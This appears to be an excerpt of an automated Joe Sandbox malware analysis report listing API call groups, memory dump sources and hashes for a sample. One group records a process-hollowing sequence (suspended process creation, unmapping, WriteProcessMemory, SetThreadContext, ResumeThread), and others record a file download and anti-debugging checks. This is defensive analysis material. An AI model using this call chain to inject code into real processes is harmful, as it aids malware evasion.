                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __wsopen_s
                                                                                  • String ID:
                                                                                  • API String ID: 3347428461-0
                                                                                  APIs
                                                                                    • Part of subcall function 0041B7DF: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00417AE4,00000001,00000364,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 0041B820
                                                                                  • _free.LIBCMT ref: 00418653
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap_free
                                                                                  • String ID:
                                                                                  • API String ID: 614378929-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                    • Part of subcall function 7FE42233: GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                    • Part of subcall function 7FE42233: NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                    • Part of subcall function 7FE42233: GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                    • Part of subcall function 7FE42233: GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  • SetErrorMode.KERNELBASE(?,?,?,00000000,?), ref: 7FE42078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentErrorInformationModeQuery
                                                                                  • String ID:
                                                                                  • API String ID: 3103590671-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00417AE4,00000001,00000364,00000006,000000FF,?,?,00413C5C,00417077,?,?,0041614E), ref: 0041B820
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                    • Part of subcall function 0041753A: RtlAllocateHeap.NTDLL(00000000,?,?,?,0041C3F2,00000220,?,?,?,?,?,?,00413CC2,?), ref: 0041756C
                                                                                  • _free.LIBCMT ref: 0041FA53
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocateErrorFreeLast_free
                                                                                  • String ID:
                                                                                  • API String ID: 314386986-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,0041C3F2,00000220,?,?,?,?,?,?,00413CC2,?), ref: 0041756C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,0041E6F0,?,?,00000000,?,0041E6F0,00000000,0000000C), ref: 0041E31D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE420F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(?), ref: 7FE433BC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  APIs
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,00910011,00910005), ref: 0091003E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708854930.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_910000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1263568516-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040240C
                                                                                  • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00402465
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 0040247E
                                                                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00402493
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 004024B6
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 004024CE
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004024D5
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 004024F4
                                                                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040250F
                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040254C
                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 0040257C
                                                                                  • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00402592
                                                                                  • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 0040259B
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 004025A9
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 004025C0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                                                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                  • API String ID: 4033543172-1050664331
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __floor_pentium4
                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                  • API String ID: 4168288129-2761157908
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00407027
                                                                                  • InternetReadFile.WININET(?,?,?,?), ref: 00407038
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407043
                                                                                  • InternetCloseHandle.WININET(?), ref: 00407052
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00407055
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseHandleInternet$File$ReadWrite
                                                                                  • String ID:
                                                                                  • API String ID: 567989605-0
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00404906
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Version
                                                                                  • String ID:
                                                                                  • API String ID: 1889659487-0
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 004155EB
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004155F5
                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                  • String ID:
                                                                                  • API String ID: 3906539128-0
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 7FE422BE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID: "
                                                                                  • API String ID: 1778838933-123907689
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  • _free.LIBCMT ref: 0041F3F4
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 0041F406
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorFreeHeapInformationLastTimeZone_free
                                                                                  • String ID:
                                                                                  • API String ID: 3107070095-0
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004242F8,?,?,00000008,?,?,00423F90,00000000), ref: 0042452A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00410C89
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor
                                                                                  • String ID:
                                                                                  • API String ID: 2325560087-0
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010FC4,00410ABD), ref: 00410FBD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 0-1793498882
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: 6d6f27163d5a91045088470029a44917658adf3661b23843a50aa446b2092e7a
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: 0D115B773009B283D604CA7DF4B45FBA395EBC53607AC53BBD4424B744E2BAE9419D08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36f53da09a597ef46754e68027e02d588dc2b792ea0009f90e6be2a57e41e326
                                                                                  • Instruction ID: 7dba653b3e80d9af872c281314c1e9a53d005ac14964c07f6537dc1932b0c6fc
                                                                                  • Opcode Fuzzy Hash: 36f53da09a597ef46754e68027e02d588dc2b792ea0009f90e6be2a57e41e326
                                                                                  • Instruction Fuzzy Hash: E4112B327501160F970CDA7C88A60B5B7D6D7CC254385957EEC4BCF282D471E913C6D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 123c6e8ee6dcd482ce5f480a0368d6ebca22ddcfbc4a85e13857beb9e3b8362c
                                                                                  • Instruction ID: b6ec0a18c76abe62825b7707b2276d01cdfebd3e797a8655b8fe7f0a7702bb1a
                                                                                  • Opcode Fuzzy Hash: 123c6e8ee6dcd482ce5f480a0368d6ebca22ddcfbc4a85e13857beb9e3b8362c
                                                                                  • Instruction Fuzzy Hash: F31138327501154F9B5CEA7D8892075BBD5A7CC350385863AEC47DF2C2E471D927C6C0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                  • Instruction ID: 4d5187461e70567e6b15c61b1bec3380518cd04694ed7892919f32605493efa9
                                                                                  • Opcode Fuzzy Hash: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                  • Instruction Fuzzy Hash: 0BE08CB2921228EBCB14DB89C944D8AF3FCEB49B04B12049BB502E3200C274DE44C7D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
